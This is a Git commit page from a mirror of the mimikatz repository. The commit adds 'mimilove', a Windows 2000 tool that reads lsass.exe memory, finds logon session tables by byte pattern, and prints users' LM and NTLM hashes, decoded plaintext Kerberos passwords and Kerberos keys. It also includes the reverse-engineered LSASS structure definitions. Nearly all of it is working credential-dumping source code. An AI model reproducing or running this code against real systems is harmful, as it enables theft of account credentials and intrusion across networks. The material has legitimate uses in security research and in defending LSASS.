RepoMirrors/mimikatz
1
0
Fork 0
mirror of https://github.com/gentilkiwi/mimikatz synced 2025-02-16 09:26:55 +00:00
Code Issues Packages Projects Releases Wiki Activity

mimilove for Windows 2000 <3

Browse Source
This commit is contained in:
Benjamin DELPY 2015-07-19 02:34:06 +02:00
parent 5084e9d803
commit 9bac6378c6
14 changed files with 763 additions and 43 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
lib/Win32/ntdll.min.lib
View File

Binary file not shown.

BIN
lib/x64/ntdll.min.lib
View File

Binary file not shown.

7
mimikatz.sln
View File

@ -41,6 +41,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mimilib", "mimilib\mimilib.
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mimidrv", "mimidrv\mimidrv.vcxproj", "{86FF6D04-208C-442F-B27C-E4255DD39402}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mimilove", "mimilove\mimilove.vcxproj", "{60D02E32-1711-4D9E-9AC2-10627C52EB40}"
EndProject
Global
GlobalSection(SubversionScc) = preSolution
Svn-Managed = True
@ -73,6 +75,11 @@ Global
{86FF6D04-208C-442F-B27C-E4255DD39402}.Release|x64.Build.0 = Release|x64
{86FF6D04-208C-442F-B27C-E4255DD39402}.Second_Release_PowerShell|Win32.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Second_Release_PowerShell|x64.ActiveCfg = Release|x64
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Release|Win32.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Release|Win32.Build.0 = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Release|x64.ActiveCfg = Release|x64
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Second_Release_PowerShell|Win32.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Second_Release_PowerShell|x64.ActiveCfg = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE

24
mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
View File

@ -320,14 +320,18 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
kull_m_string_getUnicodeString(sessionData.UserName, cLsass.hLsassMem);
kull_m_string_getUnicodeString(sessionData.LogonDomain, cLsass.hLsassMem);
kull_m_string_getUnicodeString(sessionData.LogonServer, cLsass.hLsassMem);
kuhl_m_sekurlsa_utils_getSid(&sessionData.pSid, cLsass.hLsassMem);
kull_m_string_getSid(&sessionData.pSid, cLsass.hLsassMem);
retCallback = callback(&sessionData, pOptionalData);
LocalFree(sessionData.UserName->Buffer);
LocalFree(sessionData.LogonDomain->Buffer);
LocalFree(sessionData.LogonServer->Buffer);
LocalFree(sessionData.pSid);
if(sessionData.UserName->Buffer)
LocalFree(sessionData.UserName->Buffer);
if(sessionData.LogonDomain->Buffer)
LocalFree(sessionData.LogonDomain->Buffer);
if(sessionData.LogonServer->Buffer)
LocalFree(sessionData.LogonServer->Buffer);
if(sessionData.pSid)
LocalFree(sessionData.pSid);
data.address = ((PLIST_ENTRY) (aBuffer.address))->Flink;
}
@ -692,7 +696,7 @@ void kuhl_m_sekurlsa_trust_domaininfo(struct _KDC_DOMAIN_INFO * info)
if(kull_m_string_getUnicodeString(&info->NetBiosName, cLsass.hLsassMem))
{
kprintf(L"\nDomain: %wZ (%wZ", &info->FullDomainName, &info->NetBiosName);
if(kuhl_m_sekurlsa_utils_getSid(&info->DomainSid, cLsass.hLsassMem))
if(kull_m_string_getSid(&info->DomainSid, cLsass.hLsassMem))
{
kprintf(L" / "); kull_m_string_displaySID(info->DomainSid);
LocalFree(info->DomainSid);
@ -916,8 +920,8 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
{
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY:
pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) credentials->Buffer;
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE);
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE);
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE);
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE);
kprintf(L"\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName);
if(pPrimaryCreds->isLmOwfPassword)
@ -940,8 +944,8 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
break;
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10:
pPrimaryCreds10 = (PMSV1_0_PRIMARY_CREDENTIAL_10) credentials->Buffer;
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->UserName, FALSE);
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->LogonDomainName, FALSE);
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->UserName, FALSE);
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->LogonDomainName, FALSE);
kprintf(L"\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds10->UserName, &pPrimaryCreds10->LogonDomainName);
kprintf(L"\n\t * Flags : I%02x/N%02x/L%02x/S%02x", pPrimaryCreds10->isIso, pPrimaryCreds10->isNtOwfPassword, pPrimaryCreds10->isLmOwfPassword, pPrimaryCreds10->isShaOwPassword);

30
mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
View File

@ -175,34 +175,4 @@ PVOID kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(PKULL_M_MEMORY_ADDRESS pTable, ULO
resultat = kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(pTable, LUIDoffset, luidToFind);
}
return resultat;
}
void kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, BOOL relative)
{
if(String->Buffer)
String->Buffer = (PWSTR) ((ULONG_PTR)(String->Buffer) + ((relative ? -1 : 1) * (ULONG_PTR)(BaseAddress)));
}
BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid, IN PKULL_M_MEMORY_HANDLE source)
{
BOOL status = FALSE;
BYTE nbAuth;
DWORD sizeSid;
KULL_M_MEMORY_HANDLE hOwn = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aDestin = {&nbAuth, &hOwn};
KULL_M_MEMORY_ADDRESS aSource = {(PBYTE) *pSid + 1, source};
*pSid = NULL;
if(kull_m_memory_copy(&aDestin, &aSource, sizeof(BYTE)))
{
aSource.address = (PBYTE) aSource.address - 1;
sizeSid = 4 * nbAuth + 6 + 1 + 1;
if(aDestin.address = LocalAlloc(LPTR, sizeSid))
{
*pSid = (PSID) aDestin.address;
status = kull_m_memory_copy(&aDestin, &aSource, sizeSid);
}
}
return status;
}

3
mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.h
View File

@ -18,9 +18,6 @@ PVOID kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(PKULL_M_MEMORY_ADDRESS pTable, ULO
BOOL kuhl_m_sekurlsa_utils_search(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib);
BOOL kuhl_m_sekurlsa_utils_search_generic(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PVOID * genericPtr, PVOID * genericPtr1, PVOID * genericPtr2, PLONG genericOffset1);
void kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, BOOL relative);
BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid, IN PKULL_M_MEMORY_HANDLE source);
typedef struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS {
struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS *next;
ANSI_STRING Primary;

389
mimilove/mimilove.c Normal file
View File

@ -0,0 +1,389 @@
#include "mimilove.h"
int wmain(int argc, wchar_t *argv[])
{
DWORD pid;
HANDLE hProcess;
PKULL_M_MEMORY_HANDLE hMemory;
OSVERSIONINFO osInfo;
kprintf(L"\n"
L" .#####. " MIMILOVE_FULL L"\n"
L" .## ^ ##. \n"
L" ## / \\ ## /* * *\n"
L" ## \\ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n"
L" '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)\n"
L" '#####' " MIMILOVE_SPECIAL L"* * */\n\n");
RtlZeroMemory(&osInfo, sizeof(OSVERSIONINFO));
osInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if(GetVersionEx(&osInfo))
{
if((osInfo.dwMajorVersion == 5) && (osInfo.dwMinorVersion == 0))
{
if(kull_m_process_getProcessIdForName(L"lsass.exe", &pid))
{
if(hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, pid))
{
if(kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, &hMemory))
{
mimilove_lsasrv(hMemory);
mimilove_kerberos(hMemory);
kull_m_memory_close(hMemory);
}
CloseHandle(hProcess);
}
else PRINT_ERROR_AUTO(L"OpenProcess");
}
}
else PRINT_ERROR(L"Only for Windows 2000\n");
}
else PRINT_ERROR_AUTO(L"GetVersionEx");
return ERROR_SUCCESS;
}
BOOL kuhl_m_sekurlsa_utils_love_search(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION mi, PKULL_M_MINI_PATTERN pa, PVOID * genericPtr)
{
BOOL status = FALSE;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, mi->DllBase.hMemory}, aLocalMemory = {NULL, &hLocalMemory};
KULL_M_MEMORY_SEARCH sMemory = {{{mi->DllBase.address, mi->DllBase.hMemory}, mi->SizeOfImage}, NULL};
aLocalMemory.address = pa->Pattern;
if(kull_m_memory_search(&aLocalMemory, pa->Length, &sMemory, FALSE))
{
aLsassMemory.address = (PBYTE) sMemory.result + pa->offset;
aLocalMemory.address = genericPtr;
status = kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(PVOID));
}
return status;
}
const wchar_t * KUHL_M_SEKURLSA_LOGON_TYPE[] = {
L"UndefinedLogonType",
L"Unknown !",
L"Interactive",
L"Network",
L"Batch",
L"Service",
L"Proxy",
L"Unlock",
L"NetworkCleartext",
L"NewCredentials",
L"RemoteInteractive",
L"CachedInteractive",
L"CachedRemoteInteractive",
L"CachedUnlock",
};
const ANSI_STRING
PRIMARY_STRING = {7, 8, "Primary"};
void mimilove_lsasrv(PKULL_M_MEMORY_HANDLE hMemory)
{
BYTE PTRN_W2K_LogonSessionTable[] = {0xff, 0x50, 0x10, 0x85, 0xc0, 0x74};
KULL_M_MINI_PATTERN paLsasrv = {sizeof(PTRN_W2K_LogonSessionTable), PTRN_W2K_LogonSessionTable, -9};
PLIST_ENTRY LogonSessionTable = NULL;
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION miLsasrv;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, hMemory}, aLocalMemory = {NULL, &hLocalMemory};
PVOID base;
KIWI_MSV1_0_LOGON_SESSION_TABLE_50 table;
KIWI_MSV1_0_LIST_50 list;
KIWI_MSV1_0_ENTRY_50 entry;
KIWI_MSV1_0_CREDENTIALS credentials;
KIWI_MSV1_0_PRIMARY_CREDENTIALS primaryCredentials;
PMSV1_0_PRIMARY_CREDENTIAL_50 pPrimaryCred;
kprintf(L"========================================\n"
L"LSASRV Credentials (MSV1_0, ...)\n"
L"========================================\n\n"
);
if(kull_m_process_getVeryBasicModuleInformationsForName(hMemory, L"lsasrv.dll", &miLsasrv))
{
if(kuhl_m_sekurlsa_utils_love_search(&miLsasrv, &paLsasrv, (PVOID *) &LogonSessionTable))
{
aLocalMemory.address = &base; // buffer
aLsassMemory.address = LogonSessionTable;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(PVOID)))
{
if(aLsassMemory.address = base) // buffer
{
aLocalMemory.address = &table;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_LOGON_SESSION_TABLE_50)))
{
base = (PBYTE) aLsassMemory.address + FIELD_OFFSET(KIWI_MSV1_0_LOGON_SESSION_TABLE_50, list);
if(aLsassMemory.address = table.list.Flink)
{
while(aLsassMemory.address != base)
{
aLocalMemory.address = &list;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_LIST_50)))
{
if(aLsassMemory.address = list.entry)
{
aLocalMemory.address = &entry;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_ENTRY_50)))
{
if(aLsassMemory.address = entry.Credentials)
{
kull_m_string_getUnicodeString(&entry.UserName, hMemory);
kull_m_string_getUnicodeString(&entry.Domaine, hMemory);
kull_m_string_getSid(&entry.pSid, hMemory);
kprintf(L"Authentication Id : %u ; %u (%08x:%08x)\n"
L"Session : %s from %u\n"
L"User Name : %wZ\n"
L"Domain : %wZ\n"
, entry.LocallyUniqueIdentifier.HighPart, entry.LocallyUniqueIdentifier.LowPart, entry.LocallyUniqueIdentifier.HighPart, entry.LocallyUniqueIdentifier.LowPart, KUHL_M_SEKURLSA_LOGON_TYPE[entry.LogonType], entry.Session, &entry.UserName, &entry.Domaine);
kprintf(L"Logon Time : ");
kull_m_string_displayLocalFileTime(&entry.LogonTime);
kprintf(L"\nSID : ");
if(entry.pSid)
kull_m_string_displaySID(entry.pSid);
kprintf(L"\n");
if(entry.UserName.Buffer)
LocalFree(entry.UserName.Buffer);
if(entry.Domaine.Buffer)
LocalFree(entry.Domaine.Buffer);
if(entry.pSid)
LocalFree(entry.pSid);
while(aLsassMemory.address)
{
aLocalMemory.address = &credentials;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_CREDENTIALS)))
{
if(aLsassMemory.address = credentials.PrimaryCredentials)
{
while(aLsassMemory.address)
{
aLocalMemory.address = &primaryCredentials;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)))
{
kull_m_string_getUnicodeString((PUNICODE_STRING) &primaryCredentials.Primary, hMemory);
kull_m_string_getUnicodeString((PUNICODE_STRING) &primaryCredentials.Credentials, hMemory);
kprintf(L"\t[%Z]\n", &primaryCredentials.Primary);
if(RtlEqualString(&primaryCredentials.Primary, &PRIMARY_STRING, FALSE))
{
pPrimaryCred = (PMSV1_0_PRIMARY_CREDENTIAL_50) primaryCredentials.Credentials.Buffer;
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCred, &pPrimaryCred->UserName, FALSE);
kull_m_string_MakeRelativeOrAbsoluteString(pPrimaryCred, &pPrimaryCred->LogonDomainName, FALSE);
kprintf(L"\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCred->UserName, &pPrimaryCred->LogonDomainName);
if(pPrimaryCred->isLmOwfPassword)
{
kprintf(L"\n\t * LM : ");
kull_m_string_wprintf_hex(pPrimaryCred->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
}
if(pPrimaryCred->isNtOwfPassword)
{
kprintf(L"\n\t * NTLM : ");
kull_m_string_wprintf_hex(pPrimaryCred->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
}
kprintf(L"\n");
}
else
{
kull_m_string_wprintf_hex(primaryCredentials.Credentials.Buffer, primaryCredentials.Credentials.Length, 1 | (16 << 16));
}
if(primaryCredentials.Primary.Buffer)
LocalFree(primaryCredentials.Primary.Buffer);
if(primaryCredentials.Credentials.Buffer)
LocalFree(primaryCredentials.Credentials.Buffer);
aLsassMemory.address = primaryCredentials.next;
}
else
{
PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_MSV1_0_PRIMARY_CREDENTIALS");
break;
}
}
}
aLsassMemory.address = credentials.next;
}
else
{
PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_MSV1_0_CREDENTIALS");
break;
}
}
kprintf(L"\n");
}
}
else PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_MSV1_0_ENTRY_50");
}
else PRINT_ERROR(L"list.entry is NULL\n");
aLsassMemory.address = list.Flink;
}
else
{
PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_MSV1_0_LIST_50");
break;
}
}
}
else PRINT_ERROR(L"table.list is NULL\n");
}
else PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_MSV1_0_LOGON_SESSION_TABLE_50");
}
else PRINT_ERROR(L"LogonSessionTable is NULL\n");
}
else PRINT_ERROR_AUTO(L"kull_m_memory_copy / ptr 1");
}
else PRINT_ERROR_AUTO(L"lsasrv pattern not found");
}
else PRINT_ERROR_AUTO(L"lsasrv module info");
}
void mimilove_kerberos(PKULL_M_MEMORY_HANDLE hMemory)
{
BYTE PTRN_W2K_KerbLogonSessionList[] = {0x8b, 0x5c, 0x24, 0x18, 0x8b, 0x13};
KULL_M_MINI_PATTERN paKerberos = {sizeof(PTRN_W2K_KerbLogonSessionList), PTRN_W2K_KerbLogonSessionList, -8};
PLIST_ENTRY KerbLogonSessionList = NULL;
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION miKerberos;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, hMemory}, aLocalMemory = {NULL, &hLocalMemory};
PVOID base;
BYTE hash;
KIWI_KERBEROS_LOGON_SESSION_50 session;
KIWI_KERBEROS_KEYS_LIST_5 keyList;
PKERB_HASHPASSWORD_5 pKeys;
DWORD i;
UNICODE_STRING tmpBuffer;
kprintf(L"========================================\n"
L"KERBEROS Credentials (no tickets, sorry)\n"
L"========================================\n\n"
);
if(kull_m_process_getVeryBasicModuleInformationsForName(hMemory, L"kerberos.dll", &miKerberos))
{
if(kuhl_m_sekurlsa_utils_love_search(&miKerberos, &paKerberos, (PVOID *) &KerbLogonSessionList))
{
aLocalMemory.address = &base; // buffer
aLsassMemory.address = KerbLogonSessionList;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(PVOID)))
{
if(aLsassMemory.address = base) // buffer
{
while(aLsassMemory.address != KerbLogonSessionList)
{
aLocalMemory.address = &session;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_KERBEROS_LOGON_SESSION_50)))
{
if(session.Password.Length || session.pKeyList)
{
kull_m_string_getUnicodeString(&session.UserName, hMemory);
kull_m_string_getUnicodeString(&session.Domaine, hMemory);
kull_m_string_getUnicodeString(&session.Password, hMemory);
kprintf(L"Authentication Id : %u ; %u (%08x:%08x)\n"
L"User Name : %wZ\n"
L"Domain : %wZ\n"
L"Password : "
, session.LocallyUniqueIdentifier.HighPart, session.LocallyUniqueIdentifier.LowPart, session.LocallyUniqueIdentifier.HighPart, session.LocallyUniqueIdentifier.LowPart, &session.UserName, &session.Domaine);
hash = *((PBYTE) &session.Password.Length + 1); // please...
*((PBYTE) &session.Password.Length + 1) = 0;
RtlRunDecodeUnicodeString(hash, &session.Password);
if(!session.Password.Length || kull_m_string_suspectUnicodeString(&session.Password))
kprintf(L"%wZ", &session.Password);
else
kull_m_string_wprintf_hex(session.Password.Buffer, session.Password.Length, 1);
kprintf(L"\n");
if(aLsassMemory.address = session.pKeyList)
{
aLocalMemory.address = &keyList;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_KERBEROS_KEYS_LIST_5)))
{
if(pKeys = (PKERB_HASHPASSWORD_5) LocalAlloc(LPTR, keyList.cbItem * sizeof(KERB_HASHPASSWORD_5)))
{
aLsassMemory.address = (PBYTE) session.pKeyList + sizeof(KIWI_KERBEROS_KEYS_LIST_5);
aLocalMemory.address = pKeys;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, keyList.cbItem * sizeof(KERB_HASHPASSWORD_5)))
{
for(i = 0; i < keyList.cbItem; i++)
{
kprintf(L"\t%s ", mimilove_kerberos_etype(pKeys[i].generic.Type));
if(tmpBuffer.Length = tmpBuffer.MaximumLength = (USHORT) pKeys[i].generic.Size)
{
if(tmpBuffer.Buffer = (PWSTR) pKeys[i].generic.Checksump)
{
if(kull_m_string_getUnicodeString(&tmpBuffer, hMemory))
{
kull_m_string_wprintf_hex(tmpBuffer.Buffer, tmpBuffer.Length, 0); kprintf(L"\n");
LocalFree(tmpBuffer.Buffer);
}
}
}
}
}
else PRINT_ERROR_AUTO(L"kull_m_memory_copy / KERB_HASHPASSWORD_5");
LocalFree(pKeys);
}
}
else PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_KERBEROS_KEYS_LIST_5");
}
kprintf(L"\n");
if(session.UserName.Buffer)
LocalFree(session.UserName.Buffer);
if(session.Domaine.Buffer)
LocalFree(session.Domaine.Buffer);
if(session.Password.Buffer)
LocalFree(session.Password.Buffer);
}
aLsassMemory.address = session.Entry.Flink;
}
else{
PRINT_ERROR_AUTO(L"kull_m_memory_copy / KIWI_KERBEROS_LOGON_SESSION_50");
break;
}
}
}
else PRINT_ERROR(L"KerbLogonSessionList is NULL\n");
}
else PRINT_ERROR_AUTO(L"kull_m_memory_copy / ptr 1");
}
else PRINT_ERROR_AUTO(L"kerberos pattern not found");
}
else PRINT_ERROR_AUTO(L"kerberos module info");
}
PCWCHAR mimilove_kerberos_etype(LONG eType)
{
PCWCHAR type;
switch(eType)
{
case KERB_ETYPE_NULL: type = L"null "; break;
case KERB_ETYPE_DES_PLAIN: type = L"des_plain "; break;
case KERB_ETYPE_DES_CBC_CRC: type = L"des_cbc_crc "; break;
case KERB_ETYPE_DES_CBC_MD4: type = L"des_cbc_md4 "; break;
case KERB_ETYPE_DES_CBC_MD5: type = L"des_cbc_md5 "; break;
case KERB_ETYPE_DES_CBC_MD5_NT: type = L"des_cbc_md5_nt "; break;
case KERB_ETYPE_RC4_PLAIN: type = L"rc4_plain "; break;
case KERB_ETYPE_RC4_PLAIN2: type = L"rc4_plain2 "; break;
case KERB_ETYPE_RC4_PLAIN_EXP: type = L"rc4_plain_exp "; break;
case KERB_ETYPE_RC4_LM: type = L"rc4_lm "; break;
case KERB_ETYPE_RC4_MD4: type = L"rc4_md4 "; break;
case KERB_ETYPE_RC4_SHA: type = L"rc4_sha "; break;
case KERB_ETYPE_RC4_HMAC_NT: type = L"rc4_hmac_nt "; break;
case KERB_ETYPE_RC4_HMAC_NT_EXP: type = L"rc4_hmac_nt_exp "; break;
case KERB_ETYPE_RC4_PLAIN_OLD: type = L"rc4_plain_old "; break;
case KERB_ETYPE_RC4_PLAIN_OLD_EXP: type = L"rc4_plain_old_exp"; break;
case KERB_ETYPE_RC4_HMAC_OLD: type = L"rc4_hmac_old "; break;
case KERB_ETYPE_RC4_HMAC_OLD_EXP: type = L"rc4_hmac_old_exp "; break;
case KERB_ETYPE_AES128_CTS_HMAC_SHA1_96_PLAIN: type = L"aes128_hmac_plain"; break;
case KERB_ETYPE_AES256_CTS_HMAC_SHA1_96_PLAIN: type = L"aes256_hmac_plain"; break;
case KERB_ETYPE_AES128_CTS_HMAC_SHA1_96: type = L"aes128_hmac "; break;
case KERB_ETYPE_AES256_CTS_HMAC_SHA1_96: type = L"aes256_hmac "; break;
default: type = L"unknow "; break;
}
return type;
}

127
mimilove/mimilove.h Normal file
View File

@ -0,0 +1,127 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : http://creativecommons.org/licenses/by/3.0/fr/
*/
#pragma once
#include "globals.h"
#define MIMILOVE L"mimilove"
#define MIMILOVE_VERSION L"1.0"
#define MIMILOVE_CODENAME L"Love edition <3"
#define MIMILOVE_FULL MIMILOVE L" " MIMILOVE_VERSION L" \"" MIMILOVE_CODENAME L"\" (" TEXT(__DATE__) L" " TEXT(__TIME__) L")"
#define MIMILOVE_SPECIAL L"Windows 2000 only! "
#include "../modules/kull_m_output.h"
#include "../modules/kull_m_memory.h"
#include "../modules/kull_m_process.h"
#include "../modules/kull_m_crypto_system.h"
typedef struct _KULL_M_MINI_PATTERN {
DWORD Length;
BYTE *Pattern;
LONG offset;
} KULL_M_MINI_PATTERN, *PKULL_M_MINI_PATTERN;
typedef struct _MSV1_0_PRIMARY_CREDENTIAL_50 {
LSA_UNICODE_STRING LogonDomainName;
LSA_UNICODE_STRING UserName;
BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH];
BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH];
BOOLEAN isNtOwfPassword;
BOOLEAN isLmOwfPassword;
/* buffer */
} MSV1_0_PRIMARY_CREDENTIAL_50, *PMSV1_0_PRIMARY_CREDENTIAL_50;
typedef struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS {
struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS *next;
ANSI_STRING Primary;
LSA_UNICODE_STRING Credentials;
} KIWI_MSV1_0_PRIMARY_CREDENTIALS, *PKIWI_MSV1_0_PRIMARY_CREDENTIALS;
typedef struct _KIWI_MSV1_0_CREDENTIALS {
struct _KIWI_MSV1_0_CREDENTIALS *next;
DWORD AuthenticationPackageId;
PKIWI_MSV1_0_PRIMARY_CREDENTIALS PrimaryCredentials;
} KIWI_MSV1_0_CREDENTIALS, *PKIWI_MSV1_0_CREDENTIALS;
typedef struct _KIWI_MSV1_0_ENTRY_50 {
LUID LocallyUniqueIdentifier;
LSA_UNICODE_STRING UserName;
LSA_UNICODE_STRING Domaine;
PVOID unk0;
PVOID unk1;
PSID pSid;
ULONG LogonType;
ULONG Session;
DWORD align;
FILETIME LogonTime;
PKIWI_MSV1_0_CREDENTIALS Credentials;
ULONG unk19;
PVOID unk20;
PVOID unk21;
PVOID unk22;
} KIWI_MSV1_0_ENTRY_50, *PKIWI_MSV1_0_ENTRY_50;
typedef struct _KIWI_MSV1_0_LIST_50 {
struct _KIWI_MSV1_0_LIST_50 *Flink;
struct _KIWI_MSV1_0_LIST_50 *Blink;
DWORD unk0;
DWORD lowLuid;
PKIWI_MSV1_0_ENTRY_50 entry;
} KIWI_MSV1_0_LIST_50, *PKIWI_MSV1_0_LIST_50;
typedef struct _KIWI_MSV1_0_LOGON_SESSION_TABLE_50 {
DWORD tag;
DWORD unk0;
DWORD count;
DWORD unk1;
LIST_ENTRY list; // PKIWI_MSV1_0_LIST_50
} KIWI_MSV1_0_LOGON_SESSION_TABLE_50, *PKIWI_MSV1_0_LOGON_SESSION_TABLE_50;
typedef struct _KIWI_KERBEROS_KEYS_LIST_5 {
DWORD unk0; // dword_1233EC8 dd 4
DWORD cbItem; // debug048:01233ECC dd 5
PVOID unk1;
PVOID unk2;
//KERB_HASHPASSWORD_5 KeysEntries[ANYSIZE_ARRAY];
} KIWI_KERBEROS_KEYS_LIST_5, *PKIWI_KERBEROS_KEYS_LIST_5;
typedef struct _KIWI_KERBEROS_LOGON_SESSION_50 {
LIST_ENTRY Entry;
ULONG unk0;
LUID LocallyUniqueIdentifier;
ULONG unk6;
ULONG unk7;
ULONG unk8;
PVOID unk9;
ULONG unk10;
PVOID unk11;
PVOID unk12;
PVOID unk13;
PVOID unk14;
LSA_UNICODE_STRING UserName;
LSA_UNICODE_STRING Domaine;
LSA_UNICODE_STRING Password;
ULONG unk15;
ULONG unk16;
ULONG unk17;
ULONG unk18;
PVOID unk19;
PVOID unk20;
PVOID unk21;
PVOID unk22;
PKIWI_KERBEROS_KEYS_LIST_5 pKeyList;
PVOID unk24;
LIST_ENTRY Tickets_1; // for coders, they're here =)
LIST_ENTRY Tickets_2;
ULONG unk23;
LIST_ENTRY Tickets_3;
} KIWI_KERBEROS_LOGON_SESSION_50, *PKIWI_KERBEROS_LOGON_SESSION_50;
int wmain(int argc, wchar_t *argv[]);
BOOL kuhl_m_sekurlsa_utils_love_search(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION mi, PKULL_M_MINI_PATTERN pa, PVOID * genericPtr);
void mimilove_lsasrv(PKULL_M_MEMORY_HANDLE hMemory);
void mimilove_kerberos(PKULL_M_MEMORY_HANDLE hMemory);
PCWCHAR mimilove_kerberos_etype(LONG eType);

34
mimilove/mimilove.rc Normal file
View File

@ -0,0 +1,34 @@
#include <winres.h>
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
VS_VERSION_INFO VERSIONINFO
FILEVERSION 1,0,0,0
PRODUCTVERSION 1,0,0,0
FILEFLAGS VS_FF_PRERELEASE|VS_FF_SPECIALBUILD|VS_FF_PRIVATEBUILD
FILEFLAGSMASK VS_FFI_FILEFLAGSMASK
FILEOS VOS_NT
FILETYPE VFT_APP
//FILESUBTYPE 0x0L
BEGIN
